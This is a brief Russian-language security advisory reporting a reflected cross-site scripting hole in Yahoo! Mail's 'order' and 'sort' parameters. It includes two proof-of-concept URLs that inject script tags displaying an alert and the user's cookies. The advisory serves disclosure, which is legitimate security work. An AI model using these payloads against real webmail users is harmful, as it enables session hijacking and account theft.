Программа: Yahoo! Mail 

Уязвимость обнаружена в Yahoo! Mail. Удаленный пользователь может выполнить XSS нападение.
Yahoo! Mail не проверяет правильность данных, представленных пользователем в полях ‘order’ и ‘sort’. 

Пример: 

http://[target]/ym/ShowLetter?MsgId=3308_ 151647_1069_1720_553_0_917_ -1_0&YY=96862&inc=25&order=
down"><script>alert(‘This can be your cookie’)</script>&sort=date&pos=0&view=
a&head=b&box=Inbox

http://[target]/ym/ShowLetter?MsgId=3308_15 1647_1069_1720_553_0_917_-1_0&YY=92552
&inc=25&order=down&sort=date»><script> alert(document.cookie) </script>&pos=0&view=a&head=b&box=Inbox



Оставить мнение